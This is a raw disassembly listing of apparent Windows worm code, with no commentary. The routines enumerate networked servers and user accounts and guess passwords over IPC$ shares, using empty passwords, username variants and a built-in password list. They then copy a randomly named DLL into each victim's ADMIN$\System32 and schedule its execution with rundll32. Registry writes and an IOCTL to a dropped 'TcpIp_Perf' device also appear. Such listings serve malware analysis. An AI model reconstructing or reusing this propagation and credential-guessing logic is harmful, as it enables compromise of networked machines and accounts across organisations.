push eax ; lpFileName
call esi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz short loc_9A806B
xor eax, eax
jmp loc_9A813A
; ---------------------------------------------------------------------------
loc_9A806B: ; CODE XREF: sub_9A7FAE+B4�j
lea eax, [ebp+FileName]
push 120136h ; int
push eax ; lpFileName
call sub_9AC163
pop ecx
pop ecx
push ebx ; lpOverlapped
lea eax, [ebp+BytesReturned]
push eax ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile
test eax, eax
jz loc_9A8121
mov eax, [ebp+nNumberOfBytesToWrite]
cmp [ebp+BytesReturned], eax
jnz short loc_9A8121
push [ebp+hObject] ; hObject
call CloseHandle
lea eax, [ebp+FileName]
push eax ; lpBinaryPathName
lea eax, [ebp+ServiceName]
push eax ; lpDisplayName
call sub_9A7F48
pop ecx
mov [ebp+hObject], eax
pop ecx
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA
cmp [ebp+hObject], ebx
jz short loc_9A8137
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push ebx ; dwShareMode
push edi ; dwDesiredAccess
push offset FileName ; "\\\\.\\TcpIp_Perf"
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A8115
push ebx ; lpOverlapped
lea eax, [ebp+BytesReturned]
push eax ; lpBytesReturned
push ebx ; nOutBufferSize
push ebx ; lpOutBuffer
push 0Ch ; nInBufferSize
push [ebp+lpInBuffer] ; lpInBuffer
push 9C402000h ; dwIoControlCode
push esi ; hDevice
call DeviceIoControl
test eax, eax
jz short loc_9A810E
mov [ebp+var_8], 1
loc_9A810E: ; CODE XREF: sub_9A7FAE+157�j
push esi ; hObject
call CloseHandle
loc_9A8115: ; CODE XREF: sub_9A7FAE+13B�j
lea eax, [ebp+ServiceName]
push eax ; lpServiceName
call sub_9A7EE7
pop ecx
jmp short loc_9A8137
; ---------------------------------------------------------------------------
loc_9A8121: ; CODE XREF: sub_9A7FAE+E6�j
; sub_9A7FAE+F2�j
push [ebp+hObject] ; hObject
call CloseHandle
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA
loc_9A8137: ; CODE XREF: sub_9A7FAE+122�j
; sub_9A7FAE+171�j
mov eax, [ebp+var_8]
loc_9A813A: ; CODE XREF: sub_9A7FAE+B8�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A7FAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A813F proc near ; CODE XREF: sub_9A7170+9A�p
VersionInformation= _OSVERSIONINFOA ptr -0A8h
var_14 = word ptr -14h
InBuffer = byte ptr -0Ch
push ebp
lea ebp, [esp-78h]
sub esp, 0A8h
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jz short loc_9A81BC
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnb short loc_9A816A
xor eax, eax
inc eax
jmp short loc_9A81BE
; ---------------------------------------------------------------------------
loc_9A816A: ; CODE XREF: sub_9A813F+24�j
jnz short loc_9A8190
xor eax, eax
inc eax
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A81BE
cmp [ebp+78h+VersionInformation.dwMinorVersion], eax
jnz short loc_9A8183
cmp [ebp+78h+var_14], 2
jnb short loc_9A8190
jmp short loc_9A81BE
; ---------------------------------------------------------------------------
loc_9A8183: ; CODE XREF: sub_9A813F+39�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A8190
cmp [ebp+78h+var_14], 0
jz short loc_9A81BE
loc_9A8190: ; CODE XREF: sub_9A813F:loc_9A816A�j
; sub_9A813F+40�j ...
lea eax, [ebp+78h+InBuffer]
push eax
push 10000000h
call sub_9A7E5A
test eax, eax
pop ecx
pop ecx
jz short loc_9A81BC
lea eax, [ebp+78h+InBuffer]
push eax ; lpInBuffer
push 1000h ; nNumberOfBytesToWrite
push offset dword_9A16A0 ; lpBuffer
call sub_9A7FAE
add esp, 0Ch
jmp short loc_9A81BE
; ---------------------------------------------------------------------------
loc_9A81BC: ; CODE XREF: sub_9A813F+1E�j
; sub_9A813F+63�j
xor eax, eax
loc_9A81BE: ; CODE XREF: sub_9A813F+29�j
; sub_9A813F+34�j ...
add ebp, 78h
leave
retn
sub_9A813F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A81C3(BYTE Data)
sub_9A81C3 proc near ; CODE XREF: sub_9AE6A2+31A�p
Data = byte ptr 4
push esi
push edi
push dword ptr [esp+8+Data] ; Data
mov edi, offset word_9A2716
push edi ; lpValueName
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi ; lpSubKey
push 80000001h ; hKey
call sub_9AC0F9
push dword ptr [esp+18h+Data] ; Data
push edi ; lpValueName
push esi ; lpSubKey
push 80000002h ; hKey
call sub_9AC0F9
add esp, 20h
pop edi
pop esi
retn
sub_9A81C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A81F5 proc near ; CODE XREF: StartAddress+5E�p
var_8 = dword ptr -8
Data = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and dword ptr [ebp+Data], 0
push esi
push edi
lea eax, [ebp+Data]
push eax ; lpData
mov edi, offset word_9A2716
push edi ; lpValueName
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi ; lpSubKey
push 80000001h ; int
call sub_9AC117
lea eax, [ebp+var_8]
push eax ; lpData
push edi ; lpValueName
push esi ; lpSubKey
push 80000002h ; int
call sub_9AC117
mov eax, [ebp+var_8]
add esp, 20h
cmp eax, dword ptr [ebp+Data]
pop edi
pop esi
ja short loc_9A823E
mov eax, dword ptr [ebp+Data]
loc_9A823E: ; CODE XREF: sub_9A81F5+44�j
mov ecx, [ebp+arg_0]
mov [ecx], eax
leave
retn
sub_9A81F5 endp
; =============== S U B R O U T I N E =======================================
sub_9A8245 proc near ; CODE XREF: sub_9A799E+83�p
; sub_9A8326+5C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push edi
or edi, 0FFFFFFFFh
test eax, eax
jz short loc_9A8279
mov edx, [esp+4+arg_0]
push ebx
push esi
loc_9A8257: ; CODE XREF: sub_9A8245+30�j
movzx ecx, byte ptr [edx]
push 8
inc edx
pop esi
loc_9A825E: ; CODE XREF: sub_9A8245+2D�j
mov ebx, ecx
xor ebx, edi
shr edi, 1
test bl, 1
jz short loc_9A826F
xor edi, 0EDB88320h
loc_9A826F: ; CODE XREF: sub_9A8245+22�j
shr ecx, 1
dec esi
jnz short loc_9A825E
dec eax
jnz short loc_9A8257
pop esi
pop ebx
loc_9A8279: ; CODE XREF: sub_9A8245+A�j
mov eax, edi
pop edi
retn
sub_9A8245 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A827D proc near ; CODE XREF: sub_9A86D0+28�p
Name = word ptr -208h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
push [ebp+arg_0]
lea eax, [ebp+Name]
push offset aSIpc ; "\\\\%s\\IPC$"
push 104h ; Count
push eax ; Dest
call _snwprintf
and [ebp+var_2], 0
add esp, 10h
push 1 ; fForce
push 0 ; dwFlags
lea eax, [ebp+Name]
push eax ; lpName
call WNetCancelConnection2W
xor eax, eax
leave
retn
sub_9A827D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A82BC(int, LPCWSTR lpUserName, LPCWSTR lpPassword)
sub_9A82BC proc near ; CODE XREF: sub_9A86D0+F�p
Dest = word ptr -228h
var_22 = word ptr -22h
Dst = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
lpUserName = dword ptr 0Ch
lpPassword = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 228h
push esi
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aSIpc ; "\\\\%s\\IPC$"
push 104h ; Count
push eax ; Dest
xor esi, esi
call _snwprintf
push 20h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_22], si
call memset
add esp, 1Ch
push esi ; dwFlags
push [ebp+lpUserName] ; lpUserName
lea eax, [ebp+Dest]
push [ebp+lpPassword] ; lpPassword
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push eax ; lpNetResource
mov [ebp+var_14], 3
mov [ebp+var_10], offset Str
call WNetAddConnection2W
test eax, eax
jnz short loc_9A8321
inc esi
loc_9A8321: ; CODE XREF: sub_9A82BC+62�j
mov eax, esi
pop esi
leave
retn
sub_9A82BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8326(LPCWSTR lpWideCharStr)
sub_9A8326 proc near ; CODE XREF: sub_9A86D0+1E�p
FindFileData = _WIN32_FIND_DATAW ptr -864h
FileName = word ptr -614h
var_40E = word ptr -40Eh
Servername = word ptr -40Ch
var_206 = word ptr -206h
var_204 = byte ptr -204h
var_186 = word ptr -186h
MultiByteStr = byte ptr -184h
var_183 = byte ptr -183h
var_80 = byte ptr -80h
var_6C = byte ptr -6Ch
Dest = word ptr -50h
Dst = dword ptr -34h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_28 = dword ptr -28h
Source = word ptr -24h
SystemTime = _SYSTEMTIME ptr -1Ch
JobId = dword ptr -0Ch
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 864h
mov al, ds:Password
push ebx
push esi
push edi
push 40h
pop ecx
mov [ebp+MultiByteStr], al
xor eax, eax
lea edi, [ebp+var_183]
rep stosd
xor ebx, ebx
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
stosw
stosb
mov esi, 104h
push esi ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
mov [ebp+var_4], ebx
push ebx ; dwFlags
push ebx ; CodePage
call WideCharToMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; Str
call strlen
push eax
lea eax, [ebp+MultiByteStr]
push eax
call sub_9A8245
xor eax, 45419005h
push eax ; Seed
call srand
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+Dest]
add edx, 5
push edx
push eax
call sub_9AB677
mov edi, wcscat
lea eax, [ebp+Dest]
push offset a_ ; "."
push eax ; Dest
call edi ; wcscat
lea eax, [ebp+Dest]
push eax ; Source
lea eax, [ebp+var_6C]
push eax ; Dest
call wcscpy
add esp, 28h
loc_9A83CE: ; CODE XREF: sub_9A8326+D3�j
call rand
push 3
cdq
pop ecx
idiv ecx
lea eax, [ebp+Source]
inc edx
push edx
push eax
call sub_9AB677
lea eax, [ebp+Source]
push offset aDll ; "dll"
push eax ; Str1
call wcscmp
add esp, 10h
test eax, eax
jz short loc_9A83CE
call sub_9AB510
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call edi ; wcscat
lea eax, [ebp+var_6C]
push offset aDll ; "dll"
push eax ; Dest
call edi ; wcscat
mov edi, _snwprintf
lea eax, [ebp+Dest]
push eax
push [ebp+lpWideCharStr]
lea eax, [ebp+FileName]
push offset aSAdminSystem32 ; "\\\\%s\\ADMIN$\\System32\\%s"
push esi ; Count
push eax ; Dest
call edi ; _snwprintf
lea eax, [ebp+var_6C]
push eax
push [ebp+lpWideCharStr]
lea eax, [ebp+Servername]
push offset aSAdminSystem32 ; "\\\\%s\\ADMIN$\\System32\\%s"
push esi ; Count
push eax ; Dest
mov [ebp+var_40E], bx
call edi ; _snwprintf
add esp, 38h
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+Servername]
push eax ; lpFileName
mov [ebp+var_206], bx
call FindFirstFileW
cmp eax, 0FFFFFFFFh
jz short loc_9A848C
push eax ; hFindFile
call FindClose
cmp [ebp+FindFileData.nFileSizeLow], ebx
jz short loc_9A848C
loc_9A8480: ; CODE XREF: sub_9A8326+191�j
; sub_9A8326+19E�j
mov [ebp+var_4], 1
jmp loc_9A85F4
; ---------------------------------------------------------------------------
loc_9A848C: ; CODE XREF: sub_9A8326+149�j
; sub_9A8326+158�j
push ebx ; hTemplateFile
push 6 ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileW
cmp eax, 0FFFFFFFFh
mov [ebp+JobId], eax
jnz short loc_9A84C6
call GetLastError
cmp eax, 50h
jz short loc_9A8480
cmp eax, 0B7h
jnz loc_9A85F4
jmp short loc_9A8480
; ---------------------------------------------------------------------------
loc_9A84C6: ; CODE XREF: sub_9A8326+186�j
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
push ds:nNumberOfBytesToWrite ; nNumberOfBytesToWrite
mov [ebp+NumberOfBytesWritten], ebx
push ds:lpBuffer ; lpBuffer
push eax ; hFile
call WriteFile
test eax, eax
jz short loc_9A84F7
mov eax, [ebp+NumberOfBytesWritten]
cmp eax, ds:nNumberOfBytesToWrite
jnz short loc_9A84F7
mov [ebp+var_4], 1
loc_9A84F7: ; CODE XREF: sub_9A8326+1BD�j
; sub_9A8326+1C8�j
push [ebp+JobId] ; hObject
call CloseHandle
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+FileName]
push eax ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A852C
lea eax, [ebp+MultiByteStr]
push eax ; lpFileName
call sub_9AB6A9
pop ecx
loc_9A852C: ; CODE XREF: sub_9A8326+1F7�j
cmp [ebp+var_4], ebx
jz loc_9A85E7
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_80]
add edx, 5
push edx
push eax
call sub_9AB677
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+Dest]
push eax
push offset aRundll32_exeSS ; "rundll32.exe %s,%s"
lea eax, [ebp+var_204]
push 40h ; Count
push eax ; Dest
call edi ; _snwprintf
push [ebp+lpWideCharStr]
lea eax, [ebp+Servername]
push offset aS ; "\\\\%s"
push esi ; Count
push eax ; Dest
mov [ebp+var_186], bx
call edi ; _snwprintf
add esp, 2Ch
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
mov [ebp+var_206], bx
call GetLocalTime
inc [ebp+SystemTime.wHour]
cmp [ebp+SystemTime.wHour], 18h
jb short loc_9A85A4
add [ebp+SystemTime.wHour], 0FFE8h
loc_9A85A4: ; CODE XREF: sub_9A8326+276�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
movzx eax, [ebp+SystemTime.wHour]
imul eax, 36EE80h
mov [ebp+Dst], eax
lea eax, [ebp+var_204]
mov [ebp+var_28], eax
add esp, 0Ch
lea eax, [ebp+JobId]
push eax ; JobId
lea eax, [ebp+Dst]
push eax ; Buffer
lea eax, [ebp+Servername]
push eax ; Servername
mov [ebp+var_2C], 7Fh
mov [ebp+var_2B], 11h
call NetScheduleJobAdd
jmp short loc_9A85F4
; ---------------------------------------------------------------------------
loc_9A85E7: ; CODE XREF: sub_9A8326+209�j
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileW
loc_9A85F4: ; CODE XREF: sub_9A8326+161�j
; sub_9A8326+198�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9A8326 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A85FC(LPCWSTR servername)
sub_9A85FC proc near ; CODE XREF: sub_9A870C+2B�p
; sub_9A870C+3A�p
totalentries = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
resume_handle = dword ptr -10h
entriesread = dword ptr -0Ch
var_8 = dword ptr -8
Buffer = dword ptr -4
servername = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
xor ebx, ebx
push edi
xor esi, esi
mov [ebp+Buffer], ebx
mov [ebp+resume_handle], ebx
xor edi, edi
loc_9A8611: ; CODE XREF: sub_9A85FC+B9�j
lea eax, [ebp+resume_handle]
push eax ; resume_handle
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
push 0FFFFFFFFh ; prefmaxlen
lea eax, [ebp+Buffer]
push eax ; bufptr
push 0 ; filter
push 1 ; level
push [ebp+servername] ; servername
call NetUserEnum
test eax, eax
mov [ebp+var_18], eax
jz short loc_9A863D
cmp eax, 0EAh
jnz short loc_9A86BB
loc_9A863D: ; CODE XREF: sub_9A85FC+38�j
cmp [ebp+Buffer], 0
jz short loc_9A86AE
add edi, [ebp+entriesread]
lea eax, ds:4[edi*4]
push eax ; NewSize
push esi ; Memory
mov [ebp+var_14], edi
call realloc
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_9A86A2
and [ebp+var_8], 0
cmp [ebp+entriesread], 0
jbe short loc_9A869E
xor edi, edi
loc_9A866C: ; CODE XREF: sub_9A85FC+9D�j
mov eax, [ebp+Buffer]
add eax, edi
cmp dword ptr [eax+0Ch], 0
jz short loc_9A868D
test dword ptr [eax+18h], 2
jnz short loc_9A868D
push dword ptr [eax] ; Str
call _wcsdup
mov [esi+ebx*4], eax
pop ecx
inc ebx
loc_9A868D: ; CODE XREF: sub_9A85FC+79�j
; sub_9A85FC+82�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add edi, 20h
cmp eax, [ebp+entriesread]
jb short loc_9A866C
mov edi, [ebp+var_14]
loc_9A869E: ; CODE XREF: sub_9A85FC+6C�j
and dword ptr [esi+ebx*4], 0
loc_9A86A2: ; CODE XREF: sub_9A85FC+62�j
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
and [ebp+Buffer], 0
loc_9A86AE: ; CODE XREF: sub_9A85FC+45�j
cmp [ebp+var_18], 0EAh
jz loc_9A8611
loc_9A86BB: ; CODE XREF: sub_9A85FC+3F�j
cmp [ebp+Buffer], 0
jz short loc_9A86C9
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A86C9: ; CODE XREF: sub_9A85FC+C3�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_9A85FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A86D0(int lpWideCharStr, LPCWSTR lpUserName, LPCWSTR lpPassword)
sub_9A86D0 proc near ; CODE XREF: sub_9A870C+12�p
; sub_9A870C+6D�p ...
lpWideCharStr = dword ptr 8
lpUserName = dword ptr 0Ch
lpPassword = dword ptr 10h
push ebp
mov ebp, esp
push esi
push [ebp+lpPassword] ; lpPassword
xor esi, esi
push [ebp+lpUserName] ; lpUserName
push [ebp+lpWideCharStr] ; int
call sub_9A82BC
add esp, 0Ch
test eax, eax
jz short loc_9A86FF
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_9A8326
push [ebp+lpWideCharStr]
mov esi, eax
call sub_9A827D
pop ecx
pop ecx
loc_9A86FF: ; CODE XREF: sub_9A86D0+19�j
push 3Ch ; dwMilliseconds
call Sleep
mov eax, esi
pop esi
pop ebp
retn
sub_9A86D0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A870C(LPCWSTR lpWideCharStr)
sub_9A870C proc near ; CODE XREF: sub_9A88A6+78�p
Memory = dword ptr -104h
Password = word ptr -100h
lpWideCharStr = dword ptr 4
sub esp, 104h
push ebx
push 0 ; lpPassword
push 0 ; lpUserName
push [esp+110h+lpWideCharStr] ; lpWideCharStr
call sub_9A86D0
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jnz loc_9A8891
push [esp+108h+lpWideCharStr] ; servername
call sub_9A85FC
test eax, eax
pop ecx
mov [esp+108h+Memory], eax
jnz short loc_9A8758
push eax ; servername
call sub_9A85FC
test eax, eax
pop ecx
mov [esp+108h+Memory], eax
jz loc_9A8891
loc_9A8758: ; CODE XREF: sub_9A870C+37�j
push ebp
mov ebp, wcslen
push esi
mov esi, [esp+110h+Memory]
push edi
loc_9A8765: ; CODE XREF: sub_9A870C+171�j
cmp dword ptr [esi], 0
jz loc_9A8883
mov eax, [esi]
push eax ; lpPassword
push eax ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A86D0
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jnz loc_9A886F
push dword ptr [esi] ; Str
call ebp ; wcslen
test eax, eax
pop ecx
jz loc_9A8826
push dword ptr [esi] ; Str
call ebp ; wcslen
lea eax, ds:2[eax*4]
push eax ; Size
call malloc
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A8826
push dword ptr [esi] ; Source
push edi ; Dest
call wcscpy
push dword ptr [esi] ; Source
push edi ; Dest
call wcscat
push edi ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+12Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A86D0
mov ebx, eax
add esp, 1Ch
test ebx, ebx
jnz short loc_9A881A
push dword ptr [esi] ; Str
call ebp ; wcslen
test eax, eax
pop ecx
jle short loc_9A8801
loc_9A87E5: ; CODE XREF: sub_9A870C+F3�j
push dword ptr [esi] ; Str
call ebp ; wcslen
mov ecx, [esi]
sub eax, ebx
mov ax, [ecx+eax*2-2]
mov [edi+ebx*2], ax
push dword ptr [esi] ; Str
inc ebx
call ebp ; wcslen
cmp ebx, eax
pop ecx
pop ecx
jl short loc_9A87E5
loc_9A8801: ; CODE XREF: sub_9A870C+D7�j
and word ptr [edi+ebx*2], 0
push edi ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A86D0
add esp, 0Ch
mov ebx, eax
loc_9A881A: ; CODE XREF: sub_9A870C+CE�j
push edi ; Memory
call free
test ebx, ebx
pop ecx
jnz short loc_9A886F
loc_9A8826: ; CODE XREF: sub_9A870C+86�j
; sub_9A870C+A4�j
xor edi, edi
loc_9A8828: ; CODE XREF: sub_9A870C+161�j
cmp edi, 3E4h
jnb short loc_9A886F
push 80h ; cchWideChar
lea eax, [esp+118h+Password]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ds:off_9B9010[edi] ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9A8868
lea eax, [esp+114h+Password]
push eax ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A86D0
add esp, 0Ch
mov ebx, eax
loc_9A8868: ; CODE XREF: sub_9A870C+142�j
add edi, 4
test ebx, ebx
jz short loc_9A8828
loc_9A886F: ; CODE XREF: sub_9A870C+79�j
; sub_9A870C+118�j ...
push dword ptr [esi] ; Memory
call free
add esi, 4
test ebx, ebx
pop ecx
jz loc_9A8765
loc_9A8883: ; CODE XREF: sub_9A870C+5C�j
push [esp+114h+Memory] ; Memory
call free
pop ecx
pop edi
pop esi
pop ebp
loc_9A8891: ; CODE XREF: sub_9A870C+1E�j
; sub_9A870C+46�j
push 7D0h ; dwMilliseconds
call Sleep
mov eax, ebx
pop ebx
add esp, 104h
retn
sub_9A870C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A88A6 proc near ; CODE XREF: sub_9A89BC+16�p
totalentries = dword ptr -10h
var_C = dword ptr -0Ch
entriesread = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push edi
xor edi, edi
push edi ; resume_handle
push edi ; domain
push 0FFFFFFFFh ; servertype
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
push 0FFFFFFFFh ; prefmaxlen
lea eax, [ebp+Buffer]
push eax ; bufptr
push 65h ; level
push edi ; servername
mov [ebp+var_C], edi
mov [ebp+entriesread], edi
mov [ebp+Buffer], edi
call NetServerEnum
cmp eax, edi
jz short loc_9A88E7
cmp eax, 0EAh
jnz short loc_9A8936
cmp [ebp+Buffer], edi
jz short loc_9A8943
cmp [ebp+entriesread], edi
jz short loc_9A8936
loc_9A88E7: ; CODE XREF: sub_9A88A6+2E�j
push ebx
xor ebx, ebx
cmp [ebp+entriesread], edi
jbe short loc_9A8935
push esi
xor esi, esi
loc_9A88F2: ; CODE XREF: sub_9A88A6+8C�j
mov eax, [ebp+Buffer]
add eax, esi
test byte ptr [eax+11h], 10h
jz short loc_9A892B
cmp dword ptr [eax+8], 4
jbe short loc_9A892B
push offset word_9B9F40 ; Str2
push dword ptr [eax+4] ; Str1
call wcscmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A892B
mov eax, [ebp+Buffer]
push dword ptr [esi+eax+4] ; lpWideCharStr
call sub_9A870C
pop ecx
mov [ebp+var_C], 1
loc_9A892B: ; CODE XREF: sub_9A88A6+55�j
; sub_9A88A6+5B�j ...
inc ebx
add esi, 18h
cmp ebx, [ebp+entriesread]
jb short loc_9A88F2
pop esi
loc_9A8935: ; CODE XREF: sub_9A88A6+47�j
pop ebx
loc_9A8936: ; CODE XREF: sub_9A88A6+35�j
; sub_9A88A6+3F�j
cmp [ebp+Buffer], edi
jz short loc_9A8943
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A8943: ; CODE XREF: sub_9A88A6+3A�j
; sub_9A88A6+93�j
mov eax, [ebp+var_C]
pop edi
leave
retn
sub_9A88A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8949 proc near ; CODE XREF: sub_9A89BC+F�p
nSize = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push edi
call sub_9AC33A
mov edi, eax
call sub_9AB510
and [ebp+Buffer], 0
lea eax, [ebp+Buffer]
push eax ; bufptr
push 64h ; level
push 0 ; servername
call NetWkstaGetInfo
test eax, eax
jnz short loc_9A8993
mov eax, [ebp+Buffer]
push 104h ; Count
push dword ptr [eax+4] ; Source
push offset word_9B9F40 ; Dest
call wcsncpy
add esp, 0Ch
and ds:word_9BA146, 0
jmp short loc_9A89A9
; ---------------------------------------------------------------------------
loc_9A8993: ; CODE XREF: sub_9A8949+25�j
lea eax, [ebp+nSize]
push eax ; nSize
push offset word_9B9F40 ; lpBuffer
mov [ebp+nSize], 104h
call GetComputerNameW
loc_9A89A9: ; CODE XREF: sub_9A8949+48�j
cmp [ebp+Buffer], 0
jz short loc_9A89B7
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A89B7: ; CODE XREF: sub_9A8949+64�j
mov eax, edi
pop edi
leave
retn
sub_9A8949 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_9A89BC(LPVOID)
sub_9A89BC proc near ; DATA XREF: sub_9A89E8+9�o
push esi
mov esi, Sleep
push edi
push 493E0h ; dwMilliseconds
loc_9A89C9: ; CODE XREF: sub_9A89BC+2A�j
call esi ; Sleep
call sub_9A8949
mov edi, eax
call sub_9A88A6
test edi, edi
jz short loc_9A89E1
call RevertToSelf
loc_9A89E1: ; CODE XREF: sub_9A89BC+1D�j
push 249F00h
jmp short loc_9A89C9
sub_9A89BC endp
; =============== S U B R O U T I N E =======================================
sub_9A89E8 proc near ; CODE XREF: StartAddress+1D4�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push eax ; lpParameter
push offset sub_9A89BC ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
pop ecx
retn
sub_9A89E8 endp
; =============== S U B R O U T I N E =======================================
; BOOL __stdcall fn(HWND, LPARAM)
fn proc near ; DATA XREF: sub_9A8A37+15�o
hDlg = dword ptr 4
push 1 ; nIDDlgItem
push [esp+4+hDlg] ; hDlg
call GetDlgItem
test eax, eax
jz short loc_9A8A31
push 0 ; lParam
push 0 ; wParam
push 0F5h ; Msg
push eax ; hWnd
call PostMessageA
mov ds:dword_9BA148, 1
loc_9A8A31: ; CODE XREF: fn+E�j
xor eax, eax
inc eax
retn 8
fn endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall sub_9A8A37(LPVOID)
sub_9A8A37 proc near ; DATA XREF: sub_9A8A72+127�o
dwThreadId = dword ptr 4
and ds:dword_9BA148, 0
push esi
xor esi, esi
loc_9A8A41: ; CODE XREF: sub_9A8A37+33�j
cmp ds:dword_9BA148, 0
jnz short loc_9A8A6C
push 0 ; lParam
push offset fn ; lpfn
push [esp+0Ch+dwThreadId] ; dwThreadId
call EnumThreadWindows
push 0Ah ; dwMilliseconds
call Sleep
inc esi
cmp esi, 5DCh
jl short loc_9A8A41
loc_9A8A6C: ; CODE XREF: sub_9A8A37+11�j
xor eax, eax
pop esi
retn 4
sub_9A8A37 endp
; =============== S U B R O U T I N E =======================================
